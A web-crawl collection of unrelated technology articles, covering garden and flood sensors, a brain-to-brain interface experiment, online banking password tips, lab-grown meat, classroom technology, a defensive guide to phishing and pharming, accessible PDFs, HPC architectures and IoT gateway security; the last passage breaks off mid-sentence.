capabilities. The Edyn garden sensor has temperature, humidity, light sensor and electrical leads built into the tip, which is inserted into the ground. It has a small micro-computer, is solar powered and uses Wi-Fi. When materials -- water, lime, fertilizer -- are added to the soil, their impact can be measured by how easy or difficult it is to transmit an electric current. From this data, the level of fertilizer, moisture, and acidity in the soil can be determined. There is an independent humidity sensor. The on-board processor does some initial work, but the data is further processed in a cloud-based environment, and makes recommendations on whether to add water, fertilizer or compost. This system also taps weather data and soil conditions by region and returns recommendations on what to plant and what types of plants to group. There is also a separate valve that can precisely regulate the amount of water. The arrival of platforms for electronic development, 3D printers and declining prices for sensors, is "making it a lot easier to develop hardware," said Aramburu, who compares its increasing simplicity with what's been going on in software. "Software has gotten to the point where you can pick up a language very quickly, even if you have limited computer science experience, and start building an app," he said. Similarly, Cox used widely available tools to design and build the Flood Beacon. He got the idea when he discovered that one method for checking on flood conditions involved rowing out to markers to record the water height. Flood Beacon measures water turbulence, via the accelerometer, and water depth with the ultrasonic sensors. The data is sent to Xively, an IoT-specific cloud, and is viewable on a mobile app. It took Cox about a month and half to produce a working prototype. "We're just kind of really fortunate to live in this world that we do now, where we can make something for 400 (British) pounds or 300 pounds, get it tested and get it working," said Cox. Patrick Thibodeau covers cloud computing and enterprise applications, outsourcing, government IT policies, data centers and IT workforce issues for Computerworld. Follow Patrick on Twitter at @DCgov or subscribe to Patrick's RSS feed. His e-mail address is email@example.com. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "A new industrial age is being built on sensors, 3D printing and the cloud" was originally published by Computerworld.
<urn:uuid:e15fe8ae-7abe-4218-b6ec-e2e13db33c3d>
CC-MAIN-2017-09
http://www.itworld.com/article/2695960/hardware/a-new-industrial-age-is-being-built-on-sensors--3d-printing-and-the-cloud.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00057-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955792
1,244
2.515625
3
Spock may be exceedingly happy today since the “Vulcan mind meld” is now a reality for humans, thanks to University of Washington researchers who achieved the first noninvasive human brain-to-human brain interface. One researcher sent a brain signal via the Internet and his thoughts controlled the hand movement of a fellow researcher across campus. “The Internet was a way to connect computers, and now it can be a way to connect brains. We want to take the knowledge of a brain and transmit it directly from brain to brain,” said Andrea Stocco whose finger moved on a keyboard in response to his colleague Rajesh Rao’s thoughts. “It was both exciting and eerie to watch an imagined action from my brain get translated into actual action by another brain,” Rao added. “This was basically a one-way flow of information from my brain to his. The next step is having a more equitable two-way conversation directly between the two brains.” On Aug. 12, Rao sat in his lab wearing a cap with electrodes hooked up to an electroencephalography machine, which reads electrical activity in the brain. Stocco was in his lab across campus wearing a purple swim cap marked with the stimulation site for the transcranial magnetic stimulation coil that was placed directly over his left motor cortex, which controls hand movement. The team had a Skype connection set up so the two labs could coordinate, though neither Rao nor Stocco could see the Skype screens. Rao looked at a computer screen and played a simple video game with his mind. When he was supposed to fire a cannon at a target, he imagined moving his right hand (being careful not to actually move his hand), causing a cursor to hit the “fire” button. Almost instantaneously, Stocco, who wore noise-canceling earbuds and wasn’t looking at a computer screen, involuntarily moved his right index finger to push the space bar on the keyboard in front of him, as if firing the cannon. Stocco compared the feeling of his hand moving involuntarily to that of a nervous tic. “We plugged a brain into the most complex computer anyone has ever studied, and that is another brain,” stated Chantel Prat, assistant professor in psychology at the UW’s Institute for Learning & Brain Sciences. She doesn’t want people to freak out and overestimate the technology since, “There’s no possible way the technology that we have could be used on a person unknowingly or without their willing participation.” Although Stocco jokingly called the human brain-to-brain interface a “Vulcan mind meld,” Rao said the technology cannot read a person’s thoughts. It also doesn’t give another person the ability to control your actions against your will; it can only read certain types of simple brain signals. The next experiment will involve sending more complex thoughts to another brain. If successful, then they plan to conduct experiments “on a larger pool of subjects.” Before this successful human-to-human brain interfacing demonstration, a first of its kind, Duke University researchers established a “brain-to-brain communication between two rats” and Harvard researchers were able to show brain-to-brain communication between a human and a rat. Examples of how direct brain-to-brain communication in humans might be used in the future include helping a person with disabilities “communicate his or her wish, say, for food or water. The brain signals from one person to another would work even if they didn’t speak the same language.” Or if a pilot were to become incapacitated, then someone on the ground could send human brain-to-brain signals to assist a flight attendant or passenger in landing an airplane.
<urn:uuid:99977c46-8d63-4319-87fc-806f21372b1d>
CC-MAIN-2017-09
http://www.computerworld.com/article/2474639/emerging-technology/researcher-sends-thoughts-over-internet--moves-colleague-s-hand--human-to-human-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00585-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965107
805
2.859375
3
One important key to protecting yourself online is to make sure no one steals your username and password. Stolen passwords are at the root of the problem with online banking security, and Internet security overall. Anyone who has your password can access your accounts the same way that you do. That is why a second authentication factor, something you have, is such a strong security measure. A would-be criminal has to steal something physical from you, as well as your password, to commit an online fraud. Until you can get two-factor authentication, here are the top eight rules: 1. Always make sure you are at the site you want. See, If the Internet is secure, why are there Internet security problems? 2. Don’t click on a link in an email. See, How does phishing work? 3. Try to use a browser security bar. 4. Protect yourself against phishing. See, What is the best way to prevent phishing? 5. Protect yourself against keyboard logging. See, What is a keystroke monitor? 6. Don’t store passwords on your PC if anyone else can get to it. 7. Don’t put your passwords in a file on your PC. 8. Don’t write down your passwords if you can avoid it, or hide them really, really well.
<urn:uuid:2854b420-1509-47ec-9737-d84fcc7fae92>
CC-MAIN-2017-09
https://www.justaskgemalto.com/en/how-can-i-protect-myself-while-banking-online/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00529-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938955
280
2.8125
3
In Vitro Beef: It's What's for Dinner? Scientists unveiled the world's first lab-grown hamburger at a press event in London on Monday, showcasing a patty made from stem cells -- a technique that could help alleviate the growing demand for more sustainable beef products. Mark Post, a scientist at Maastricht University, spent about two years developing the process for making in vitro, or cultured, meat products. Post used stem cells taken harmlessly from the shoulder muscle of cows to create the 5 oz. burger that debuted Monday. Post placed the stem cells in petri dishes, where they multiplied and merged into strands. About 20,000 of the strands were required to create one burger. On a larger scale, one sample of cells would be enough to produce as much as 20,000 tons of lab-grown meat, Post said. He used the event Monday to highlight the need for alternative meat products, noting that global meat production is a large contributor to greenhouse gas emissions and other environmental pressures. The research project cost about US$332,000 and was funded by Google cofounder Sergey Brin, who shares Post's concerns about developing sustainable meat products. Bumps in the Road Several hurdles will have to be overcome in the production of cultured meat products, Post said, and it could be two decades or more before it becomes a staple on the dinner table. Cost and taste are the two primary concerns. Even if in vitro meat production were scaled up, the product could cost about $30 per pound, the researchers noted Monday. As for flavor, the lack of fat in the lab-grown burger makes the texture less juicy than a natural burger, Post acknowledged. Beyond the technical and economic concerns, there is the question of public reaction to burgers that have been produced inside a lab, said Braden Allenby, professor of engineering and ethics at Arizona State University. "There are obviously some critical steps -- getting the cost down, determining how serious cultural aversion to factory meat might be, how strong the opposition is from agricultural interests, figuring out whether factory meat is a niche luxury food or an expensive commodity product -- and how those play out will have a lot to do with the time frames involved," he told TechNewsWorld. Another hurdle for any food product made for the mass market is the rigorous safety testing it must pass, said James Tillotson, professor of food policy and international business at Tufts University. "There are a lot of safety issues here," he told TechNewsWorld. "You're going to have to figure out how to control certain microorganisms from growing on this -- not just in the lab, but also if you're packaging and shipping the food. And you also have to look at the long-term effects of eating synthetic products. That's a lot of testing." Tinkering Away at Burgers That testing might be a few steps closer to taking place, though, said Allenby. Following Monday's event and the buzz that Post's in vitro burger has received -- including his urging for more funded research -- cultured meat may have earned a few more followers. "Synthetic meat research is badly underfunded at this point, in part because it is viewed as a high-tech fantasy rather than a serious potential environmental technology," he pointed out. "Now that there's a well-publicized proof of principle, it is likely that activity will accelerate. If and when it becomes apparent that this might be a commercially viable product, it will be interesting to see how the large agricultural firms begin responding."
<urn:uuid:4f0e190f-9583-4915-beaa-6b944bdb0f22>
CC-MAIN-2017-09
http://www.linuxinsider.com/story/science/78653.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171043.28/warc/CC-MAIN-20170219104611-00229-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967964
728
2.71875
3
Chromebooks, iPads, Edmodo, network printers, USB drives, Androids, cloud storage, Prezi, virtual reality, LCD projectors and apps. The vocabulary words above that were at one time nonexistent now fill the conversations of educators and students today. Technology is now at the heart of the classroom experience, but it can be the bane of a teacher’s existence. If he or she needs to capture students’ attention and ensure they have mastered core concepts, then Chromebooks and apps can get in the way. Teaching can be a frustrating and challenging occupation all by itself. Adding in all of those gadgets and gizmos can be totally overwhelming at times. Despite the headaches, there is no denying that technology has brought some wonderful positives into the classroom. So raise your SMART board remotes, smile at your dual monitors and give three cheers for these reasons to be thankful for technology in the classroom: Thank you technology… for new teaching tools. Teaching tools have come such a long way over the years. Imagine trying to illustrate a scientific experiment with only chalk and a chalkboard or teaching a new concept without an updated textbook. Remember filmstrips, mimeographs and slide projectors? Teachers used to have to wait years to get new tools in their classrooms. But now that we have the Internet with free applications that download in seconds, we can change our lessons and activities on the fly. Have a kid that just isn’t getting it? Just Google a new tool to teach in a different way. Check out “The Evolution of Classroom Technology” by Edudemic here for a little teaching nostalgia. Thank you technology… for time savings. Speaking of changing up a lesson plan: With Internet tech at their fingertips, teachers can save so much time planning by looking for other lessons online. Technological resources like screen sharing between student and teacher computers can get students to the right place in an online textbook quickly and easily. Cloud storage resources, such as Google Drive, allow teachers to access files ASAP instead of searching through a file cabinet for an old lesson. Need a quick video to help illustrate a concept? Youtube it! For years, teachers had to present the same lessons with the same activities over and over because it took so much time to change anything. Now, we have a zillion resources at our fingertips to find new ideas or concepts to make our own. Thank you technology… for better communication. Before we had technology that informed parents about their kids’ grades, the message was delivered in a note sent home in a backpack. Inevitably, a mischievous student would “lose” the note and keep the parent uninformed of what was going on in class. Now, there is email. A teacher can send a note to a parent any time during the day and inform him or her of everything going on in class. Because of technology, teachers can now communicate with students more easily, too. Apps like Edmodo allow teachers and students to connect on the Internet from anywhere. The Remind app lets teachers send safe text message reminders to students about tests, permission slips or upcoming events. Network monitoring software allows teachers and students to instant message each other through their laptops and desktop computers in classrooms so that questions can be asked privately without disrupting class. Because of technology, students and teachers are more connected and communicative than ever. Thank you technology… for fun! As stated in the introduction, technology in classrooms can be frustrating. But it also can be so much fun! How cool is it that we can project a live view of the Eiffel Tower onto a huge screen in our classrooms because of Google Earth? We can now have a lively game of educational Jeopardy by using smart phones as clickers. We can give kids a virtual reality experience of climbing Mount Everest. Thanks to technology, we are able to show students how vast and amazing the world is. We can open their eyes to new experiences and give them the tools to educate themselves. We can instill the excitement of discovery by providing fun ways of learning. Thanks technology, for making learning FUN! This Thanksgiving, Impero Software would like to thank all of our clients for believing in our software solution and for supporting our business. We appreciate you.
<urn:uuid:551b1a3e-c19e-4aba-a7ac-a5ad3ca00298>
CC-MAIN-2017-09
https://www.imperosoftware.com/4-reasons-to-be-thankful-for-technology-in-the-classroom/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00050-ip-10-171-10-108.ec2.internal.warc.gz
en
0.943654
885
3.03125
3
Phishing is a method of trying to gather personal information using deceptive e-mails and websites. Pharming also aims to collect personal information from unsuspecting victims by essentially tinkering with the road maps that computers use to navigate the Web. You don't want either one working its evil genius on you, your employees or your customers. Here's how to be on your guard against both phishing and pharming. Last updated: April 2009 - What is phishing? - Can we prevent phishing attacks? - What can my company do to reduce our chances of being targeted? - What plans should my company have in place before a phishing incident occurs? - How can we quickly find out if a phishing attack has been launched using our company's name? - How can we help our customers avoid falling for phishing? - If an attack does happen, how should we respond? - Any legal/regulatory requirements we should be aware of? - What action can we take against the phishers themselves? - How might phishing attacks evolve in the near future? (E.g. "spear-phishing) - How can we guard against pharming attacks? Q: What is phishing? A: Phishing is a method of trying to gather personal information using deceptive e-mails and websites. Typically, a phisher sends an e-mail disguised as a legitimate business request. For example, the phisher may pass himself off as a real bank asking its customers to verify financial data. (So phishing is a form of "social engineering".) The e-mail is often forged so that it appears to come from a real e-mail address used for legitimate company business, and it usually includes a link to a website that looks exactly like the bank's website. However, the site is bogus, and when the victim types in passwords or other sensitive information, that data is captured by the phisher. The information may be used to commit various forms of fraud and identity theft, ranging from compromising a single existing bank account to setting up multiple new ones. Early phishing attempts were crude, with telltale misspellings and poor grammar. Since then, however, phishing e-mails have become remarkably sophisticated. Phishers may pull language straight from official company correspondence and take pains to avoid typos. The fake sites may be near-replicas of the sites phishers are spoofing, containing the company's logo and other images and fake status bars that give the site the appearance of security. Phishers may register plausible-looking domains like aolaccountupdate.com, mycitibank.net or paypa1.com (using the number 1 instead of the letter L). They may even direct their victims to a well-known company's actual website and then collect their personal data through a faux pop-up window. Can we prevent phishing attacks? Companies can reduce the odds of being targeted, and they can reduce the damage that phishers can do (more details on how below). But they can't really prevent it. One reason phishing e-mails are so convincing is that most of them have forged "from" lines, so that the message looks like it's from the spoofed company. There's no way for an organization to keep someone from spoofing a "from" line and making it seem as if an e-mail came from the organization. A technology known as sender authentication does hold some promise for limiting phishing attacks, though. The idea is that if e-mail gateways could verify that messages purporting to be from, say, Citibank did in fact originate from a legitimate Citibank server, messages from spoofed addresses could be automatically tagged as fraudulent and thus weeded out. (Before delivering a message, an ISP would compare the IP address of the server sending the message to a list of valid addresses for the sending domain, much the same way an ISP looks up the IP address of a domain to send a message. It would be sort of an Internet version of caller ID and call blocking.) Although the concept is straightforward, implementation has been slow because the major Internet players have different ideas about how to tackle the problem. It may be years before different groups iron out the details and implement a standard. Even then, there's no way of guaranteeing that phishers won't find ways around the system (just as some fraudsters can fake the numbers that appear in caller IDs). That's why, in the meantime, so many organizations—and a growing marketplace of service providers—have taken matters into their own hands. What can my company do to reduce our chances of being targeted by phishing attacks? In part, the answer has to do with NOT doing silly or thoughtless things that can increase your vulnerability. Now that phishing has become a fact of life, companies need to be careful about how they use e-mail to communicate with customers. For example, in May 2004, Wachovia's phones started ringing off the hook after the bank sent customers an e-mail instructing them to update their online banking user names and passwords by clicking on a link. Although the e-mail was legitimate (the bank had to migrate customers to a new system following a merger), a quarter of the recipients questioned it. As Wachovia learned, companies need to clearly think through their customer communication protocols. Best practices include giving all e-mails and webpages a consistent look and feel, greeting customers by first and last name in e-mails, and never asking for personal or account data through e-mail. If any time-sensitive personal information is sent through e-mail, it has to be encrypted. Marketers may wring their hands at the prospect of not sending customers links that would take them directly to targeted offers, but instructing customers to bookmark key pages or linking to special offers from the homepage is a lot more secure. That way, companies are training their customers not to be duped. It also makes sense to revisit what customers are allowed to do on your website. They should not be able to open a new account, sign up for a credit card or change their address online with just a password. At a minimum, companies should acknowledge every online transaction through e-mail and one other method of the customer's choosing (such as calling the phone number on record) so that customers are aware of all online activity on their accounts. And to make it more difficult for phishers to copy online data-capture forms, organizations should avoid putting them on the website for all to see. Instead, organizations should require secured log-in to access e-commerce forms. At the end of the day, though, better authentication is the best way to decrease the likelihood that phishers will target your organization. Banks are beginning to experiment with technologies like RSA tokens, biometrics, one-time-use passwords and smart cards, all of which make their customers' personal information less valuable for phishers. One midsized bank was able to cut its phishing-related ATM card losses by changing its authentication process. Every ATM card has data encoded on its magnetic strip that the customer can't see but that most ATM machines can read. The bank worked with its network provider to use that hidden information to authenticate ATM transactions—an important step that, according to Gartner, only about half of U.S. banks had taken by mid-2005. "Since the number isn't printed on the back of the card, customers can't accidentally disclose it," the bank's CISO explained. The information was already in the cards, so the bank didn't have to go through an expensive process of reissuing cards. "It was a very economical solution, and it's been very effective," said the CISO. What plans should my company have in place before a phishing incident occurs? Before your organization becomes a target, establish a cross-functional anti-phishing team and develop a response plan so that you're ready to deal with any attack. Ideally, the team should include representatives from IT, internal audit, communications, PR, marketing, the Web group, customer service and legal services. This team will have to answer some hard questions, such as: * Where should the public send suspicious e-mails involving your brand? Set up a dedicated e-mail account, such as email@example.com, and monitor it closely. * What should call center staff do if they hear a report of a phishing attack? Make sure that employees are trained to recognize the signs of a phishing attack and know what to tell and ask a customer who may have fallen for a scam. * How and when will your organization notify customers that an attack has occurred? You might opt to post news of new phishing e-mails targeting your company on your website, reiterating that they are not from you and that you didn't and won't ask for such information. * Who will take down a phishing site? Larger companies often keep this activity in-house; smaller companies may want to outsource. - If you keep the shut-down service in-house, a good response plan should outline whom to contact at the various ISPs to get a phisher site shut down as quickly as possible. Also, identifying law enforcement contacts at the FBI and the Secret Service ahead of time will improve your chances of bringing the perpetrator to justice. - If a vendor is used, decide what the vendor can do on your behalf. You may want to authorize representatives to send e-mails and make phone calls, but have your legal department handle any correspondence involving legal action. * When will the company take action against a phishing site, such as feeding it inaccurate information or exploiting vulnerabilities in its coding? Talk out the many pros and cons beforehand. * How far will you go to protect customers? Decide how much information about identity theft you'll give to customers who fall for a scam, and how this information will be delivered. You should also talk through scenarios in which you will monitor or close and re-open affected accounts. * Are you inadvertently training your customers to fall for phishing scams? Educate the sales and marketing teams about characteristics of phishing e-mails. Then, make sure legitimate e-mails don't set off any alarms. How can we quickly find out if a phishing attack has been launched using our company's name? Sometimes a new phish announces itself violently, as an organization's e-mail servers get pummeled with phishing e-mails that are bouncing back to their apparent originator. There are other ways to learn about an attack, though—either before or after it occurs. a) Monitor for fraudulent domain name registrations. Phishers often set up the fake sites several days before sending out phishing e-mails. One way to stop them from swindling your customers is to find and shut down these phishing sites before phishers launch their e-mail campaigns. You can outsource the search to a fraud alert service. These services use technologies that scour the Web looking for unauthorized uses of your logo or newly registered domains that contain your company's name, either of which might be an indication of an impending phishing attack. This will give your company time to counteract the strike (more on that later). b) Set up a central inbox.CSO. To do this, organizations typically set up one e-mail address where all suspected phishing e-mails are directed, with an address such as firstname.lastname@example.org or email@example.com. Ideally, this central inbox should be monitored 24/7. The easiest and most effective way to find out if your organization is being targeted by phishers is simply by giving the general public a way to report phishing attacks. "It's your customers and noncustomers who are going to be the ones that tell you that the phish is out there," said one security manager interviewed for a case study published in c) Watch your Web traffic.Internet Storm Center recommends that by examining Web traffic logs and looking for spikes in referrals from specific, heretofore unknown IP addresses, CSOs may be able to zero in on sites used for large-scale phishing attacks. After gathering victims' information, many phishing sites then redirect the victim to a log-in page on the real website the phisher is spoofing. SANS's d) Hire a firm to help.Brandimensions hosts a vast, interconnected network of domain names and e-mail addresses intended solely to attract phishing e-mails and other spam. They're called honeypots. Entire websites are built to publish e-mail addresses, point to one another, and thereby attract the attention of automated Web crawlers that compile spam lists. The company then uses "relevancy detection software" to flag the e-mails that could be most damaging to its customers. The same companies that scan the Internet for unauthorized uses of your logo can also monitor for active phishing sites. For example, Toronto-based How can we help our customers avoid falling for phishing? People who know about phishing stand a better chance of resisting the bait. "The best defense is that a consumer has heard of phishing and is unlikely to respond," says Patricia Poss, an attorney with the Bureau of Consumer Protection at the Federal Trade Commission. Must be trained to think twice about replying to any e-mail or pop-up that requests personal information.
<urn:uuid:0b4119f6-5309-4502-81ce-11eab5a68e80>
CC-MAIN-2017-09
http://www.csoonline.com/article/2117843/identity-theft-prevention/phishing--the-basics.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00226-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955542
2,779
2.890625
3
Millions of people are visually impaired and must use assistive technology (AT) to read electronic content. Assistive technology software is sometimes called screen readers. To ensure equal access to information, the US Congress enacted legislation in 1998 to require U.S. Federal agencies and contractors to procure accessible software and to produce accessible electronic documents. The regulations, known as Section 508, went into effect in June, 2001. Section 508 ensures content is tagged in correct order, section headings, bulleted and numbered lists, and footnotes and endnotes are properly identified. The Appligent accessibility group has put together a document containing a useful set of guidelines to follow when creating documents which need to be made accessible and Section 508 compliant. The “PDF Creation Best Practices” document talks about the following: - Fonts and Bullets - Formatting Issues - Formatting Issues Specific to Microsoft Work Taking the time to follow these simple guidelines can save your organization a lot of time and money when preparing an accessible document. The web page can be found here: PDF Creation Best Practices
<urn:uuid:63375ad5-7519-4005-9297-7e762bef07dd>
CC-MAIN-2017-09
https://labs.appligent.com/pdfblog/creating-section-508-friendly-documents/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00154-ip-10-171-10-108.ec2.internal.warc.gz
en
0.887315
222
2.875
3
The chronology of high performance computing can be divided into “ages” based on the predominant systems architectures for the period. Starting in the late 1970s vector processors dominated HPC. By the end of the next decade massively parallel processors were able to make a play for market leader. For the last half of the 1990s, RISC based SMPs were the leading technology. And finally, clustered x86 based servers captured market priority in the early part of this century. This architectural path was dictated by the technical and economic effect of Moore’s Law. Specifically, the doubling of processor clock speed every 18 to 24 months meant that without doing anything, applications also roughly doubled in speed at the same rate. One effect of this “free ride” was to drive companies attempting to create new HPC architectures from the market. Development cycles for new technology simply could not outpace Moore’s Law-driven gains in commodity technology, and product development costs for specialized systems could not compete against products sold to volume markets. The more general-purpose systems were admittedly not the best architectures for HPC users’ problems. However commodity component based computers were inexpensive, could be racked and stacked, and were continually getting faster. In addition, users could attempt to parallelize their applications across multiple compute nodes to get additional speed ups. In a recent Intersect360 study, users reported a wide range of scalable applications, with some using over 10,000 cores, but with the median number of cores used by a typical HPC application of only 36 cores. In the mid 2000s, Moore’s Law went through a major course correction. While the number of transistors on a chip continued to double on schedule, the ability to increase clock speed hit a practical barrier — “the power wall.” The exponential increase in power required to increase processor cycle times hit practical cost and design limits. The power wall led to clock speeds stabilizing at roughly 3GHz and multiple processor cores being placed on a single chip with core counts now ranging from 2 to 16. This ended the free ride for HPC users based on ever faster single-core processors and is forcing them to rewrite applications for parallelism. In addition to the power wall, the scale out strategy of adding capacity by simply racking and stacking more compute server nodes caused some users to hit other walls, specifically the computer room wall (or “wall wall”) where facilities issues became a major problem. These include physical space, structural support for high density configurations, cooling, and getting enough electricity into the building. The market is currently looking to a combination of four strategies to increase the performance of HPC systems and applications: parallel applications development; adding accelerators to standard commodity compute nodes; developing new purpose-built systems; and waiting for a technology breakthrough. Parallelism is like the “little girl with the curl,” when parallelism is good it is very, very good, and when it is bad it is horrid. Very good parallel applications (aka embarrassingly parallel) fall into such categories as: signal processing, Monte Carlo analysis, image rendering, and the TOP500 benchmark. The success of these areas can obscure the difficulty in developing parallel applications in other areas. Embarrassingly parallel applications have a few characteristics in common: - The problem can be broken up into a large number of sub-problems. - These sub-problem are independent of one another, that is they can be solved in any order and without requiring any data transfer to or from other sub-problems, - The sub-problems are small enough to be effectively solved on whatever the compute node du jour might be. When these constraints break down, the programming problem first becomes interesting, then challenging, then maddening, then virtually impossible. The programmer must manage ever more complex data traffic patterns between sub-problems, plus control the order of operations of various tasks, plus attempt to find ways to break larger sub-problems into sub-sub-problems, and so on. If this were easy it would have been done long ago. Adding accelerators to standard computer architectures is a technique that has been used throughout the history of computer architecture development. Current HPC markets are experimenting with graphics processing units (GPUs) and to a lesser extent field programmable gate arrays (FPGAs). GPUs have long been a standard component in desktop computers. GPUs are of interest for several reasons: they are inexpensive commodity components, they have fast independent memories, and they provide significant parallel computational power. FPGAs are standard devices long in use within the electronics industry for quickly developing and fielding specialty chips that are often replaced in products by standard ASICs over time. FPGAs allow HPC users to essentially customize the computer to the requirements of their applications. In addition they should benefit from Moore’s Law advancements over time. Challenges for accelerator-based systems stem from a single program being run over two different processing devices, one a general-purpose processor with limited speed, and the other an accelerator with high processing speed but with limited overall functionality. Challenges fall into three major areas: - Programming — Computers can be built to arbitrarily high levels of complexity, however the average complexity of computer programmers remains a constant. Accelerators add two levels of complexity for applications development, first writing a single program that is divided between two different processor types, and second, writing a program that can take advantage of the specific characteristics of the accelerator. - Control and communications — Performance gains from accelerations can be diminished or lost from compute overhead generated from setting up the problem on the accelerator, moving data between the standard processor and the accelerator, and coordinating the operations of both compute units. - Data management — Programming complexity is increased and performance is reduced in cases where the standard processor and accelerator use separate independent memories. Issues for managing data across multiple processors range from determining proper data decomposition, to efficiently moving data in and out of the proper memories, to stalling processes while waiting on data from another memory, to debugging programs where it is unclear which processor has last modified a data item. Many of these issues are associated with parallel computing in general, however they are still significant for accelerator-based operations, and the close coupling between the processor and the accelerator may require programmers to have a deep understanding of the behavior of the physical hardware components. Purpose-built systems are systems that are designed to meet the requirements of HPC workflows. (These systems were initially called supercomputers.) In today’s market, new HPC architectures still make use of commodity components such as processor chips, memory chips/DIMMS, accelerators, I/O ports, and so on. However they introduce novel technologies in such areas as: - Memory subsystems — Arguably the most important part of any HPC computer is the memory system. HPC applications tend to stream a few large data sets from storage through memory, into processors, and back again for a normal workflow. In addition, such requirements as spare matrix calculations lead to requirements for fast access to non-contiguous data elements. The speed at which the data can be moved is the determining factor in the ultimate performance in a large portion, if not the majority, of HPC applications. - Parallel system interconnects — Parallel computer essentially address the memory bandwidth problem by creating a logically two dimension memory structure, one dimension is within nodes. i.e., between a nodes local memory and local processors. Total bandwidth in this case is the sum off all node bandwidths and is very high. The second dimension is the node to node interconnect, which is essentially a specialized local area network that is significantly slower in both bandwidth and latency measures than local node memories. As applications become less embarrassingly parallel the communications over the interconnect increases, and the interconnect performance tends to become the limiting factor in overall applications performance. - Packaging — The speed of computer components. i.e., processors and memories can be increased by reducing the temperature at which they run. In addition, parallel computing latency issues can be addressed by simply packing nodes closer together, which requires both fitting more wires into a smaller space, and removing high amounts of heat from relatively small volumes. Developing specialized HPC architectures has, up until recently, been limited by the effects of Moore’s Law, which has shortened product cycle times for standard products, and limited market opportunities for specialized systems. Those HPC architecture efforts that have gone forward have generally received support from government and/or large corporation R&D funds. Waiting for a technology breakthrough (or the “then a miracle happens” strategy) is always an alternative; it is also the path of least resistance, and one step short of despair. Today we are looking at such technologies as optical computing, quantum entanglement communications, and quantum computers for potential future breakthroughs. The issue with relying on future technologies is there is no way to tell first, if a technology concept can be turned into viable a product — there is many a slip between the lab and loading dock. Second, even if it can be shown that a concept can be productized, it is virtually impossible to predict when the product will actually reach the market. Even products based on well understood production technologies can badly overrun schedules, sometimes bringing to grief those vendors and users who bet on new products. The above arguments suggests that the next age of high performance computing could be based on anything from reliance on clusters with speed boosts add-ons, to a brave new computer based on technologies that may not have been heard of yet. (You can never go wrong with a forecast like that.) That said, I am willing to lay odds on purpose-built computers becoming a major component, if not the defining technology of the HPC market within the next five years, for two major reasons. First, there is no “easy” technical solution. Single thread performance has plateaued; the usefulness of accelerators is dependent on both the parallelism inherent to the application and the connectivity between the accelerator and the rest of the system; and parallelism, while an advantage where it can be found, is not a panacea for computing performance. Second, the economics of HPC system development have changed. Users cannot simply sit back and wait for a faster CPU, but must make significant investments in either new software, or new architectures, or both. Staying with old economic models will lead to the computation tools defining the science, where work will be restricted to those areas that will run well on off-the-shelf computers. The HPC market is at a point where the business climate will support greater levels of innovation at the architectural level, which should lead to new organizing principle for HPC systems. The goal here is to find new approaches that will effectively combine and optimize the various standard components into systems that can continue to grow performance across a broad range of applications. Of course we can always wait for a miracle to happen.
<urn:uuid:d2ecbb23-3352-4122-a345-cc88e146e01c>
CC-MAIN-2017-09
https://www.hpcwire.com/2011/12/08/revisiting_supercomputer_architectures/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00398-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946065
2,254
3.3125
3
Almost a year after the Higgs boson announcement, the world's most powerful particle accelerator, the Large Hadron Collider (LHC), is getting upgraded. The work will result in increased collision energy and allow scientists to look even more closely at the universe's known and unknown building blocks. The need for the upgrade is related to thousands of electrical connections among the accelerator's magnets that weren't robust enough for the accelerator to run at the energy it was designed to. This design weakness led to major damage to the LHC in 2008. The Higgs boson is one of two types of fundamental particles, and it's a particular game-changer in the field of particle physics, proving how particles gain mass, according to the CERN website. Long sections of the 27 kilometer LHC tunnel are actually straight. But when it's time for the beams of atomic particles to turn, large magnets are used do to the job. During this lull the accelerator's four detectors are also undergoing upgrades and maintenance, and can be viewed in greater detail. The detectors are designed to track the motion and measure the energy and charge of new particles thrown out in all directions after a collision. The goal is to have the LHC running in the spring of 2015. Send news tips and comments to firstname.lastname@example.org
<urn:uuid:ad13dfdc-b39c-4b38-bb15-3b0d90f72edb>
CC-MAIN-2017-09
http://www.networkworld.com/article/2168283/data-center/the-large-hadron-collider-shows-its-insides-as-upgrade-work-commences.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00446-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948498
274
3.078125
3
Internet of things products are small, networked and unfortunately have almost always little or no security. Sometimes this is down to a lack of willingness by the manufacturer but it is also partly due to the nature of the product – small and light also means that these devices have few resources for complex security features such as encryption and packet inspection. This leads to vulnerabilities, numerous attack vectors and ultimately to a bot device which can be abused by almost anyone. Following the latest large-scale attacks that primarily use IoT devices as a digital army there is a loud demand from those who want more legislation and governments to get involved. In a hearing before the Committee on Energy and Commerce of the US House of Representatives, the security guru Bruce Schneier stated that “catastrophic risks” would arise through the proliferation of insecure technology on the Internet. Whether there will be such a catastrophe or whether the manufacturers of IoT devices will realize that the current way might not be the right one remains to be seen. But until then something must be done to improve security and at least for the problem of insufficient computing power there is a simple remedy: IoT Gateways. IoT Gateways have already existed for some time, albeit with a different focus. Until now they have been used primarily to link legacy devices that do not have a network interface to TCP/IP. Sometimes they are only used to control switching contacts via an IP address. In other cases, old machines or PLCs can still communicate but they have a proprietary rather than standard protocol such as Ethernet, Modbus or Profibus. In this scenario, the IoT Gateway acts as a local intermediate station, receives data from sensors and actuators, extracts any information needed and forwards datagrams. It is also possible to store data at the gateway and only provide it on request, for example via an embedded web server. The evolution of the IoT gateways as a VPN client is a logical 